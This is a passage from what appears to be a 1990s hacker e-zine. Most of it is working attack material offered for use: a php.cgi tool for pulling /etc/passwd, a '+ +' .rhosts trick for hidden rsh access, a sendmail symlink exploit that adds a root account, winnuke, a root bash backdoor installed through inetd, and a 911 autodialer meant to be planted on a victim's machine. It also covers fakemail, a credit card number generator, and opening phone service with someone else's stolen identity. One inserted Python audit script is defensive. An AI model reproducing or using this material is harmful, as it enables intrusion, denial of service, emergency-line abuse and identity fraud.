    outsocket = socket (AF_INET, SOCK_STREAM, 0);
    memset (&serv_addr, 0, sizeof (serv_addr));
    serv_addr.sin_family = AF_INET;
    nametocheck = gethostbyname (hosta);
    (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr));
    strcpy (host, inet_ntoa (outgoing));
    serv_addr.sin_addr.s_addr = inet_addr (host);
    serv_addr.sin_port = htons (80);
    signal(SIGALRM,Call);
    FLAG = 1;
    alarm(10);
    X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
    alarm(0);
    if(FLAG == 1 && X==0){
      write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));
      while((X=read(outsocket,FileBuf,8096))!=0)
        write(1,FileBuf,X);
    }
    close (outsocket);
  }
  return 0;
}

4. Use php To Get Files : phpget.c : p1

Here's the phpget.c, use it wisely... Some useful files to pull include...

/etc/passwd
/etc/hosts
/etc/services
/etc/syslogd.conf
/etc/inetd.conf

/* p1 (peewun@heterosexual.com)
   This code retrieves a file using php.cgi on a remote system.
   This program is for educational purposes only. Use it on p1.com.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

FILE *server;
int sock;

void do_connect(char *host, char *toget);

void do_connect(char *host, char *toget)
{
  char inbuf[1024];
  struct sockaddr_in sin;
  struct hostent *hp;
  char *tmpbuf;

  hp = gethostbyname(host);
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(80);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) {
    printf("Made connection to %s.\n\n", host);
  } else {
    printf("Failed to connect to %s.\n\n",host);
    exit(0);
  }
  server=fdopen(sock, "a+");
  fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget);
  printf("Output from php.cgi request:\n\n");
  while(1){
    if (fgets(inbuf, 1024, server) == NULL)
      break;
    printf(inbuf);
  }
}

main(int argc,char **argv)
{
  printf("\nThis program retrieves files off a remote system using php.cgi.\n");
  printf("Author: p1 - peewun@heterosexual.com\n");
  if (argc < 3) {
    printf("Usage: %s \n",argv[0]);
    printf("   Ex: %s www.p1.com /etc/passwd\n",argv[0]);
  } else {
    char *buffer;
    (char *)"exit";
    do_connect(argv[1],argv[2]);
    exit(1);
  }
}

5. Hiding From Who : so1o

Okay, bog standard easy shit, works on nearly all systems depending on security
arrangements. I advise you always try this method first when trying to hide.

DONT type the % signs !!!@~"!* ThEy ArE PrOmPtZ!!!

Telnet into the system, then type...

% cd
% echo "+ +" >> .rhosts

If this gives an error, like "Cannot create .rhosts" then try...

% cd
% echo "+ +" > .rhosts

Next telnet to the machine's EXACT address, not 127.0.0.1 or localhost; this
way works the most effectively, as it says "last login from..." and you don't
want your ip to be mentioned, or for anyone to get suspicious, so you will
need to cover your tracks.

% telnet machine.host.com

(then log in again, using the same L/P) now exit completely, using exit twice.
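The "+ +" line just echoed into .rhosts is the artefact the article's own closing note says administrators look for, and the sendmail script in item 6 below leaves a second one, /var/tmp/dead.letter turned into a symlink. As an added defender's example (not part of this article or of any tool it mentions), the audit below walks a root tree for both: it parses rhosts/hosts.equiv syntax, grades wildcard trust, and flags a symlinked dead.letter. The directory tree and its contents are constructed so the script runs offline; point audit_host() at "/" on a real system. Function names are the example's own.

```python
# Added example, not from the zine: audit for .rhosts/hosts.equiv wildcards and a
# symlinked /var/tmp/dead.letter. The tree built in demo() is constructed.
import os
import tempfile


def parse_rhosts(text):
    """Return (host, user) pairs from rhosts/hosts.equiv syntax, skipping comments."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        entries.append((host, user))
    return entries


def rhosts_risk(entries):
    """'+ +' trusts everyone; '+' host trusts every host; '+' user trusts every user."""
    worst = None
    for host, user in entries:
        if host == "+" and user == "+":
            return "any host, any user"
        if host == "+":
            worst = "any host"
        elif user == "+" and worst is None:
            worst = "any user"
    return worst


def audit_rhosts(root, home_base="home"):
    """Scan etc/hosts.equiv, root/.rhosts and every <home>/.rhosts under root."""
    findings = {}
    candidates = [os.path.join(root, "etc", "hosts.equiv"),
                  os.path.join(root, "root", ".rhosts")]
    homes = os.path.join(root, home_base)
    if os.path.isdir(homes):
        for name in sorted(os.listdir(homes)):
            candidates.append(os.path.join(homes, name, ".rhosts"))
    for path in candidates:
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as f:
            risk = rhosts_risk(parse_rhosts(f.read()))
        if risk:
            findings[os.path.relpath(path, root)] = risk
    return findings


def audit_dead_letter(root):
    """A symlinked dead.letter means sendmail's append lands in whatever it points at."""
    path = os.path.join(root, "var", "tmp", "dead.letter")
    if os.path.islink(path):
        return "symlink -> " + os.readlink(path)
    return None


def audit_host(root):
    """Combine both checks into one {relative path: finding} report."""
    findings = audit_rhosts(root)
    dl = audit_dead_letter(root)
    if dl:
        findings["var/tmp/dead.letter"] = dl
    return findings


def demo():
    """Constructed tree: one '+ +' user, one harmless .rhosts, one dead.letter symlink."""
    root = tempfile.mkdtemp()
    for d in ("etc", "home/alice", "home/bob", "var/tmp"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "home/alice/.rhosts"), "w") as f:
        f.write("+ +\n")                                  # what the article echoes in
    with open(os.path.join(root, "home/bob/.rhosts"), "w") as f:
        f.write("# trusted workstation\nws1.example.org bob\n")
    with open(os.path.join(root, "etc/hosts.equiv"), "w") as f:
        f.write("+\n")                                    # every host, same-named users
    os.symlink("/etc/passwd", os.path.join(root, "var/tmp/dead.letter"))
    return audit_host(root)


if __name__ == "__main__":
    for path, risk in sorted(demo().items()):
        print(f"{path}: {risk}")
```

The rsh/rlogin trust this file grants survives a password change, as the article says, so the fix is removing the wildcard entries (or the r-services from inetd.conf), not resetting the account.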
The system is now all set up for you to log in without being seen or logged,
as the "+ +" you echo to the .rhosts file in the user's home directory is
actually used so that you can remotely execute commands on the system using
rsh, or log into the system remotely using rlogin. Neither operation requires
a password, just a login name, so if the user changes his password you will
still be able to use this technique. Now we can attempt to log into the system
untraced; for this we need to either run Linux, or be in a shell. Follow this
one easy step, replacing "login" with your login, and host.com with the EXACT
host you want to get into...

% rsh -l login host.com csh -i

eg...

% rsh -l tetsu microsoft.com csh -i

This then runs csh (c shell) on the remote host (microsoft) in interactive
mode.. you should see something like this...

% rsh -l tetsu microsoft.com csh -i
...Thus no control on this tty, blah blah blah
%

Now you are in, type who :

% who
%

w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now you
can proceed to hack the host without having to worry who's watching you.

Note : Systems Administrators often look over their users' directories for
.rhosts files, so be aware of that.

6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1

If modeX would have given us his 884 REMOTE exploit with all the offsets, then
we would have published it, but he didn't, so we ain't :( Have the local
version instead...

#!/bin/bash
clear
echo
echo Sendmail 8.8.4 and 8.8.5 local exploit.
echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97.
echo
if [ $1 = "-rm" ]
then
  echo Removing /var/tmp/dead.letter
  echo
  rm -rf /var/tmp/dead.letter
  echo Attempting to continue with exploit.
  echo
fi
if [ -e /var/tmp/dead.letter ]
then
  echo File exists: /var/tmp/dead.letter
  echo
  echo If you wish to run this exploit, please delete it by running this
  echo exploit with the -rm flag.
  echo
  exit
fi
ln -s /etc/passwd /var/tmp/dead.letter
cat >> unf << _EOF_
helo
mail from: very@bad.address.here
rcpt to: another@bad.bad.address
data
owned::0:0:exploitation:/:/bin/sh
.
_EOF_
cat unf | telnet localhost 25 >> /dev/null
rm -rf unf
echo
echo Please wait for dead.letter to possibly be appended to by sendmail.
echo
sleep 10
if grep exploitation /etc/passwd
then
  echo Successful addition of account 'owned' to /etc/passwd, running 'su.'
  su owned
else
  echo Unsuccessful exploitation of symbolic link bug.
fi

7. Ident Scanner : ident-scan.c : Dave Goldsmith

Very very useful and quick tool, especially if it finds daemons running as
root that shouldn't be... Or even backdoors on high ports.

Usage : ident-scan [low port] [high port]

/*
 * ident-scan [v0.15]
 * This TCP scanner has the additional functionality of retrieving
 * the username that owns the daemon running on the specified port.
 * It does this by attempting to connect to a TCP port, and if it
 * succeeds, it will send out an ident request to identd on the
 * remote host. I believe this to be a flaw in the design of the
 * protocol, and if it is the developers' intent to allow 'reverse'
 * idents, then it should have been stated clearer in the
 * rfc (rfc1413).
 *
 * USES:
 * It can be useful to determine who is running daemons on high ports
 * that can be security risks. It can also be used to search for
 * misconfigurations such as httpd running as root, other daemons
 * running under the wrong uids.
 *
 * COMPILES: Compiles fine under Linux, BSDI and SunOS 4.1.x.
 *
 * Dave Goldsmith
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

enum errlist
{
  BAD_ARGS,BAD_HOST,NO_IDENT,SOCK_ERR
};

void usage(error)
enum errlist error;
{
  fprintf(stderr,"ident-scan: ");
  switch(error)
  {
    case BAD_ARGS: fprintf(stderr,"usage: ident-scan hostname [low port] [hi port]\n");
                   break;
    case BAD_HOST: fprintf(stderr,"error: cant resolve hostname\n");
                   break;
    case NO_IDENT: fprintf(stderr,"error: ident isnt running on host\n");
                   break;
    case SOCK_ERR: fprintf(stderr,"error: socket() failed\n");
                   break;
  }
  exit(-1);
}

struct hostent *fill_host(machine,host)
char *machine;
struct hostent *host;
{
  if ((host=gethostbyname(machine))==NULL)
  {
    if ((host=gethostbyaddr(machine,4,AF_INET))==NULL)
      return(host);
  }
  return(host);
}

int main(argc,argv)
int argc;
char **argv;
{
  struct sockaddr_in forconnect,forport,forident;
  int i,sockfd,identfd,len=sizeof(forport),hiport=9999,loport=1,curport;
  struct servent *service;
  struct hostent *host;
  char identbuf[15], recieved[85], *uid;

  if ((argc<2) || (argc>4))
    usage(BAD_ARGS);
  if (argc>2)
    loport=atoi(argv[2]);
  if (argc>3)
    hiport=atoi(argv[3]);
  if ((host=fill_host(argv[1],host))==NULL)
    usage(BAD_HOST);
  forconnect.sin_family=host->h_addrtype;
  forconnect.sin_addr.s_addr=*((long *)host->h_addr);
  forident.sin_family=host->h_addrtype;
  forident.sin_addr.s_addr=*((long *)host->h_addr);
  forident.sin_port=htons(113);
  if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
    usage(SOCK_ERR);
  if ((connect(identfd,(struct sockaddr *)&forident,sizeof(forident)))!=0)
    usage(NO_IDENT);
  close(identfd);
  for(curport=loport;curport<=hiport;curport++)
  {
    for(i=0;i!=85;i++) recieved[i]='\0';
    forconnect.sin_port=htons(curport);
    if ((sockfd=socket(AF_INET,SOCK_STREAM,0))== -1)
      usage(SOCK_ERR);
    if (connect(sockfd,(struct sockaddr *)&forconnect,sizeof(forconnect))==0)
    {
      if (getsockname(sockfd,(struct sockaddr *)&forport,&len)==0)
      {
        if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
          usage(SOCK_ERR);
        if (connect(identfd,(struct sockaddr *)&forident,sizeof(forident))==0)
        {
          sprintf(identbuf,"%u,%u",htons(forconnect.sin_port),
                  htons(forport.sin_port));
          write(identfd,identbuf,strlen(identbuf)+1);
          read(identfd,recieved,80);
          recieved[strlen(recieved)-1]='\0';
          uid=strrchr(recieved,' ');
          service=getservbyport(forconnect.sin_port,"tcp");
          printf("Port: %3d\tService: %10s\tUserid: %s\n",curport,
                 (service==NULL)?"(?)":service->s_name,uid);
        }
      }
    }
    close(sockfd);
    close(identfd);
  }
}

8. Windoze NT / 95 Killer : winnuke.c : _eci

/* winnuke.c - (05/07/97)  By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define dport 139  /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye";  /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
  struct sockaddr_in blah;
  struct hostent *he;
  bzero((char *)&blah,sizeof(blah));
  blah.sin_family=AF_INET;
  blah.sin_addr.s_addr=inet_addr(server);
  blah.sin_port=htons(port);

  if ((he = gethostbyname(server)) != NULL) {
    bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
  }
  else {
    if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
      perror("gethostbyname()");
      return(-3);
    }
  }

  if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
    perror("connect()");
    close(sock);
    return(-4);
  }
  printf("Connected to [%s:%d].\n",server,port);
  return;
}

void main(int argc, char *argv[]) {
  if (argc != 2) {
    printf("Usage: %s \n",argv[0]);
    exit(0);
  }
  if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("socket()");
    exit(-1);
  }
  open_sock(s,argv[1],dport);
  printf("Sending crash... ");
  send(s,str,strlen(str),MSG_OOB);
  usleep(100000);
  printf("Done!\n");
  close(s);
}

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================

1. Federal Bugging Frequencies : Weapon-X

Commonly Used by Federal Agencies for Bugs, Wireless Microphones, and Body
Wires (also 138-220 mhz, and 399-420 mhz, under 25-50 mw).

149.3500, 165.9125, 167.3375, 167.3425, 167.4875, 168.0115, 169.2000,
169.4450, 169.5050, 170.2450, 170.3050, 171.0450, 171.1050, 171.4500,
171.6000, 171.7500, 171.8450, 171.8500, 171.9050, 172.0000, 172.2000,
172.2125, 172.2375, 172.2625, 172.2875, 172.3125, 172.3375, 172.3625,
172.3875, 172.5500, 173.3375

169.445, 169.505, 170.245, 170.305, 171.045, 171.105, 171.845, 171.905

27.5750      Customs Low Power < 5 watts
27.5850      Customs Low Power < 5 watts
163.1000     Customs Low Power < 30 watts
418.5750     Customs Low Power < 30 watts
40.1200      Federal Shared Mobile Locator Transmitters "Bumper Beepers"
40.1700      Federal Shared Mobile Locator Transmitters "Bumper Beepers"
40.2200      Federal Shared Mobile Locator Transmitters "Bumper Beepers"
40.2700      Federal Shared Mobile Locator Transmitters "Bumper Beepers"
164.9125     FBI Surveillance
165.9125     ATF F5 Surveillance
166.2875     ATF
170.4125     ATF
407.8000     Secret Service
406.2750     Secret Service
408.5000     Secret Service
408.9750     Secret Service
172.2000     DOJ/DEA CH.1
171.6000     DOJ/DEA CH.2
418.0500     DEA Low Power
418.0750     DEA Low Power
418.5750     DEA Low Power
418.7500     DEA
418.6750     DEA
418.9000     DEA F2 CINDY (416.325) Surveillance
418.7500     DEA F3 GAIL Surveillance/Strike Force
418.6750     DEA F4 EMILY (416.325) Surveillance
407.8000     CIA, State Department
408.0500     Federal Shared
408.5750     Federal Shared
409.4000     Federal Shared
960-1215mhz  Spread Spectrum Systems (Wideband)

Generally Recognized Federal Bug/Spy Bands

Primary   - 25-50mhz, 135-175mhz, 225-440mhz, 1710-1950mhz, 8.3-12.5ghz
Secondary - 890mhz-5.50ghz, 7.0-9.5ghz, 10-39.6ghz

Also, Wide Band Frequency Hopping centered on various UHF-TV channels (ie: 510
or 670 mhz with a hopping width of +/- 25 mhz)

Keep in mind that the federal government can use virtually any frequency
between DC and light. So get scanning now!!

2. 911 Autodialler Script : dk

Okay, scenario... Your friend g1mpfuck is on his Linux system, you have never
really liked him, and he has gone out to someplace for a few hours, to be back
this evening... If you root his system and run this, his modem will dial 911
every 10 mins, but as soon as you do run it, it will kill the pppd and dial the
number, so if he's on IRC, then he will quit...

Here it is! Read the instructions in the code first...

#!/bin/sh
# 911-autodial.sh
#
# for use with linux boxes running DIP.
# dials 911 every ten minutes, and if the user is using pppd
# it kills pppd in order to place the call.
# IMPORTANT!!!
# add this line to root's crontab with: crontab -e root
# 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh
# note: this assumes the modem device is: /dev/modem
# if it is otherwise change "port modem" to
# "port cua1" or whatever the modem device is
# although it is usually /dev/modem.

echo " get $local 0.0.0.0" >> /tmp/911.dip
echo " get $remote 0.0.0.0" >> /tmp/911.dip
echo " port modem" >> /tmp/911.dip
echo " speed 38400" >> /tmp/911.dip
echo " reset" >> /tmp/911.dip
echo " send ATQ0V1E1X4\r" >> /tmp/911.dip
echo " wait OK 2" >> /tmp/911.dip
echo " dial 911" >> /tmp/911.dip
ps -aux|grep pppd|grep -v grep >> /tmp/ppp-check
grep "^root" /tmp/ppp-check > /dev/null 2>&1
if [ $? -ne 0 ] ; then
  echo "PPP IS DEAD" > /tmp/ppp-dead
fi
if [ -f /tmp/ppp-dead ]; then
  /sbin/dip /tmp/911
  rm /tmp/ppp-*
  rm /tmp/911.dip
  exit 1
fi
kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}'`
/sbin/dip /tmp/911
rm /tmp/ppp-*
rm /tmp/911.dip
exit 1

3. Cellular Calls Without Cloning : TRON

There are several ways to make free calls with a cellular phone that does not
have service, without the hassle of cloning it, or if you have a phone that
can't be cloned or you don't want to buy the expensive equipment required, so
here are a few ways to do it from home with little risk...

1.) American Roaming Network.
----------------------------- To reach the American Roaming Network (or something like it, depending on where you are), put your phone on the alternate carrier side so it says roam, then dial 0 and it should tell you your call is being forwarded. At that point you should be connected to an automated system, form here you have a couple of billing options... To use a credit or calling card, you enter the area code and number you want to call; for a calling card you then enter the card number and pin, for a credit card you then enter the card number and expirarion date, then the zip code of the billing address. ARN takes MasterCard, American Express, and most local and long distance company calling cards. They say they dont take VISA anymore, but I've gotten them to work on the automated system. If the number you call is busy or doesn't answer, you can press * and then either leave a message that the system will deliver, or try another number. If you want to dial another number you will have to put the zip code again after the new number. You can also make collect and 3rd party billed calls by dialing 0 instead of the number to call when you connect to ARN. You will be sent to an operator, tell them you would like to place a call. They will then ask how you would like to bill it. You can set up a local dialup voice mail box and change the greeting so it sounds like someone's there to accept the charges, the operator has to read a script, so you have to adjust the timing to get it just right. ARN will not 3rd party or collect bill to 800 numbers, nor will they place calls to 800 numbers charged to 3rd party numbers. 2.) Social Engineering. ----------------------- Another way is to dial 611 and tell the customer support person that you're having trouble getting through to the area you're trying yo call and could they try place the call for you. 
This works about 50% of the time, it helps to have the name and cell number of
someone who has service with that provider in case they ask for it, they might
ask for the social security number too, so be prepared, dumpster diving at a
cell store is the easiest place to get that info.

3.) Set Up Service With Someone Else's Info.
--------------------------------------------

The best way, and the one I prefer to cloning, is to get someone else's
information and set up service. The best place to get the information you'll
need is from a place that does credit checks, like a bank or car dealership.
Make sure they have a good rating, like A, B or C, then you won't be asked for
a deposit. You'll need a name, address, social security number, driver's
license number and work number. You will also need a cell phone that is not
stolen. They will not activate a stolen phone, when I tried they put me on hold
and called the person whose phone I had and then told me the person wanted me
to mail the phone back to them. Also find and write down the electronic serial
number, you'll need that too.

You then need to call a local cell service provider (i.e. GTE MobilNet,
Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell you
about the different service plans and pick one. They will then ask for your
"information" and ESN. Then they will ask to call you back with your new cell
number, tell them that you're out and ask for a number to call them back at,
they will have no problem with this. Then call them back and they will tell you
how to program your new number into your phone, they might also tell you how to
program in a new system ID and paging channel etc, this is no big deal. Also
ask when the billing cycle ends and when the bill is sent out, you will want to
stop using this number when the person you're billing it to gets their bill. Be
sure to get call features like 3-way and call forwarding, they're always useful
to have.
I prefer this to cloning because it's less worry and hassle and it lasts up to
a month.

===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================

1. Getting Your Exploits Onto Systems : so1o

You want to get files or exploits onto another system, you can do this the
following few ways...

1) Mail The User The File.
--------------------------

This method is simple, easy to do, pretty undetectable, but sometimes may be a
touch too slow, depending on the location / speed of the system...just mail
login@host.com the file or whatever, then wait at the other side for them to
get it.

2) FTP to the system.
----------------------

Using an FTP client, you can FTP to the remote server from your system, then
upload the files to the server, but you will most probably get logged, and so
if your exploits fail, this may not be such a good idea...

3) Use cat to input the file from the terminal.
-----------------------------------------------

This is easy to do, pretty quick and effective, follow these steps...
FearFactory:~:$ cat > heh.c << STOP
#include <stdio.h>
main()
{
printf("Quit Laughin' At Yerself Yew Gimp :P\n");
}
STOP
FearFactory:~:$ cat heh.c
#include <stdio.h>
main()
{
printf("Quit Laughin' At Yerself Yew Gimp :P\n");
}
FearFactory:~:$ cc -o heh heh.c
FearFactory:~:$ heh
Quit Laughin' At Yerself Yew Gimp :P
FearFactory:~:$

I used "cat > filename.c << STOP" to input the file from the terminal, I could
have cut a file from another editor, then just pasted it to the terminal, then
when I type "STOP" and hit enter, cat stops taking input from the terminal and
EOF's the file...Then I cat it again, to prove that the STOP does not stay as
part of the file, then I proceed to compile the source using cc and then I run
the program, easy =)

Always remember to remove traces of exploits from the system if you fail, as
this is messy and could lead to the admin becoming suspicious, just keep your
technique clean, and you will learn some good skills...

Recommended Reading :
---------------------

LINUX IN A NUTSHELL - A Desktop Quick Reference
By Jessica Perry Hekman
Copyright 1997 O'Reilly & Associates
ISBN 1-56592-167-4
UK : 14.99   US : $19.95   CAN : $28.95

I really like this book, it's very easy to use, pretty compact, and 424 pages
long, the information in it will boost your skills by a long way if you are a
newbie, and there are a lot of more advanced features, such as debugfs and many
other programs and their syntax. Basically it's a dictionary of Linux commands,
along with a short explanation, the syntax for the command and many examples,
I have the first printing, which is January 1997, so this book is not old at
all, and pretty up-to-date...

2. Fakemailing Techniques : so1o

Fakemailing is old and very very easy to do. To use this simple fakemailing
program just make a file, such as letter.txt with the stuff you want to send in
it, like "Hey Bill! how's it going?" or whatever. Next compile the fakemail.c
using gcc -o sendfake sendfake.c ignore any warning messages.
Run the program using "sendfake" and follow the steps, simple as that =)

/**********************************************************/
/* SENDFAKE.C                                             */
/*                                                        */
/*                                                        */
/* Author: asm@quantum.syspac.com                         */
/*                                                        */
/* To compile: gcc -o sendfake sendfake.c                 */
/* Usage : sendfake                                       */
/*                                                        */
/**********************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

#define MAXLEN 256

int s;

int call_socket(char *hostname)
{
  struct sockaddr_in sa;
  struct hostent *hp;
  int a, s;

  if ((hp=gethostbyname(hostname))==NULL) return(-1);
  bzero(&sa, sizeof(sa));
  bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length);
  sa.sin_family = hp->h_addrtype;
  sa.sin_port = htons((u_short)25);
  if((s=socket(hp->h_addrtype, SOCK_STREAM, 0)) < 0) return(-1);
  if(connect(s, &sa, sizeof(sa)) < 0) { close(s); return(-1); }
  return(s);
}

int readln(char *buf)
{
  int to=0;
  char c;

  do {
    if(read(s, &c, 1)<1) return(0);
    if((c >= ' ') || (c <= 126))
      if(to",from);
  writeln(str);
  readln(buf);
  do {
    input("Send fake mail TO",to);
    sprintf(str, "RCPT TO: <%s>",to);
    writeln(str);
    readln(buf);
    *(buf+3) = 0;
    if(atoi(buf) == 250) break;
    else printf("%s",buf+4);
  } while(1);
  input("Name of lamer getting the fake mail",name);
  input("Subject of fake mail",subject);
  writeln("DATA");
  sprintf(str,"To: %s <%s>",name,to);
  writeln(str);
  if(strlen(subject)) {
    sprintf(str, "Subject: %s", subject);
    writeln(str);
  }
  do {
    input("File to read and include in fake mail",str);
    if(!strlen(str)) { close(s); exit(1); }
    if((fp = fopen(str,"rt")) == NULL)
      printf("Could not find file %s\n", str);
    else break;
  } while(1);
  while(fgets(str,MAXLEN,fp)) write(s, str, strlen(str));
  writeln("\n.\n");
  readln(buf);
  writeln("QUIT\n");
  printf("Sent!!!\n");
  close(s);
}

3. Pascal Credit Card Generator Source : Lobster Guacamole

PROGRAM ccnum;

{ Written by Lobster Guacamole.                                             }
{                                                                           }
{ I wrote this program because I enjoy fucking over every goddam bureaucratic }
{ and/or fascist aspect of our society.
This program simply spits out ten }
{ random credit card numbers based on the bank prefix used. See lines 58    }
{ through 61 for information on the bank prefix used. There is also a lame  }
{ password feature for minor security. See lines 42 through 50 for          }
{ information on the password feature.                                      }
{                                                                           }
{ Remember, however, the numbers that are spit out may not work because     }
{ the credit card company may not have assigned that number to a customer   }
{ yet. Have fun!                                                            }
{                                                                           }
{ You can use a simple program like pas2c to translate this code into c     }
{ - Tetsu Khan                                                              }

USES Crt;

VAR
  ccnum_count : Integer;

PROCEDURE program_init;
BEGIN
  Randomize;
  CheckBreak := False;
END;

PROCEDURE show_title;
BEGIN
  ClrScr;
  Writeln;
  Writeln( 'CCNUM - Credit Card Number Generator.' );
  Writeln( 'Written by Lobster Guacamole.' );
  Writeln;
END;

PROCEDURE get_pwd;
VAR
  program_pwd : String;
BEGIN
  Writeln;
  Write( 'Enter password>' );
  Readln( program_pwd );
  IF program_pwd = 'a' THEN        { The current password is a lower case    }
    BEGIN                          { letter 'a'. Recompile the program if    }
      Writeln;                     { you change the password, of course.     }
      Writeln( 'Correct' );        { Change password on line 47 as well.     }
      Writeln;
    END;
  IF program_pwd <> 'a' THEN       { If you changed the password on line 40, }
    BEGIN                          { change it here, too.                    }
      Writeln;
      Writeln( 'Incorrect' );
      Halt;
    END;
END;

PROCEDURE make_ccnum;
VAR
  ccnum_digits    : ARRAY[ 1..16 ] OF Integer;
  doub_odd_digits : ARRAY[ 1..8 ] OF Integer;
  digit_count     : Integer;
  yn_choice       : Char;
  added_digits    : Integer;
BEGIN
  ccnum_digits[1] := 5;   { This part may have to be changed depending }
  ccnum_digits[2] := 4;   { on the bank prefix used. The bank prefix   }
  ccnum_digits[3] := 2;   { here is '5424', the prefix for Citibank.   }
  ccnum_digits[4] := 4;   { Recompile the program if you change it.
}
  REPEAT
    FOR digit_count := 5 TO 16 DO
      BEGIN
        ccnum_digits[ digit_count ] := Random(10);
      END;
    doub_odd_digits[1] := 2 * ccnum_digits[1];
    IF doub_odd_digits[1] > 9 THEN doub_odd_digits[1] := doub_odd_digits[1] - 9;
    doub_odd_digits[2] := 2 * ccnum_digits[3];
    IF doub_odd_digits[2] > 9 THEN doub_odd_digits[2] := doub_odd_digits[2] - 9;
    doub_odd_digits[3] := 2 * ccnum_digits[5];
    IF doub_odd_digits[3] > 9 THEN doub_odd_digits[3] := doub_odd_digits[3] - 9;
    doub_odd_digits[4] := 2 * ccnum_digits[7];
    IF doub_odd_digits[4] > 9 THEN doub_odd_digits[4] := doub_odd_digits[4] - 9;
    doub_odd_digits[5] := 2 * ccnum_digits[9];
    IF doub_odd_digits[5] > 9 THEN doub_odd_digits[5] := doub_odd_digits[5] - 9;
    doub_odd_digits[6] := 2 * ccnum_digits[11];
    IF doub_odd_digits[6] > 9 THEN doub_odd_digits[6] := doub_odd_digits[6] - 9;
    doub_odd_digits[7] := 2 * ccnum_digits[13];
    IF doub_odd_digits[7] > 9 THEN doub_odd_digits[7] := doub_odd_digits[7] - 9;
    doub_odd_digits[8] := 2 * ccnum_digits[15];
    IF doub_odd_digits[8] > 9 THEN doub_odd_digits[8] := doub_odd_digits[8] - 9;
    added_digits := doub_odd_digits[1] + doub_odd_digits[2] + doub_odd_digits[3] +
                    doub_odd_digits[4] + doub_odd_digits[5] + doub_odd_digits[6] +
                    doub_odd_digits[7] + doub_odd_digits[8] +
                    ccnum_digits[2] + ccnum_digits[4] + ccnum_digits[6] +
                    ccnum_digits[8] + ccnum_digits[10] + ccnum_digits[12] +
                    ccnum_digits[14] + ccnum_digits[16];
  UNTIL added_digits MOD 10 = 0;
  Writeln( ' ', ccnum_digits[1], ccnum_digits[2], ccnum_digits[3], ccnum_digits[4],
           ' ', ccnum_digits[5], ccnum_digits[6], ccnum_digits[7], ccnum_digits[8],
           ' ', ccnum_digits[9], ccnum_digits[10], ccnum_digits[11], ccnum_digits[12],
           ' ', ccnum_digits[13], ccnum_digits[14], ccnum_digits[15], ccnum_digits[16] );
END;

BEGIN
  program_init;
  show_title;
  get_pwd;
  FOR ccnum_count := 1 TO 10 DO
    make_ccnum;
END.

4. in.courierd : backdoor on port 530 : so1o

As root do the following (without the %'s ;]) to setup the backdoor.
--------------------------------------------------------------------

[This Method Has Been Tested On A Linux 2.0.30]

% cp /bin/bash /usr/sbin/in.courierd
% chmod 4755 /usr/sbin/in.courierd                    [optional, depends on system]
% echo "courier stream tcp nowait root /usr/sbin/in.courierd" >> /etc/inetd.conf
% /sbin/pidof inetd.conf                              [to find the pid of inetd.conf]
% kill -HUP                                           [replace the with the real pid]
% telnet localhost 530                                [test backdoor]

All commands to the backdoor must end with ;, for example....

exit;
ps -a;
whoami;
cd /;

You are root when you use the backdoor, and you are not seen or logged. The
last time I used this, it stayed up for 2 weeks =)

The above commands I have tested in Linux, I have heard that you have to reboot
a Sun for the new settings to take effect (shutdown -r now). But hey! it's only
a prototype at the moment until I make it cool and a lot better =)

Have fun.

so1o

5. UK Laws On Computer Misuse : Darkfool

This part is actually useful info, not like Darkfool's lesser works...Partially
edited by me, the original can be now found at www.sinnerz.com/bible.htm - T_K

Hey, this is an interesting little read. Please note it still can be quite
interesting even if you don't live in the UK - Darkfool.

The 1990 Computer Misuse Act - UK
---------------------------------

In plain English.
-----------------

"An Act to make provision for securing computer material against unauthorised
access or modification; and for connected purposes"

{ This is the long title (header) of the Act and confirms what the act does
  and applies to. }

SECTION 1 Unauthorised access to computer material
--------------------------------------------------

TEXT:

A person is guilty of an offence if he causes a computer to perform any
function with intent to secure access to any program or data held in any
computer.
{ This means that if you can get access to files which you shouldn't be allowed
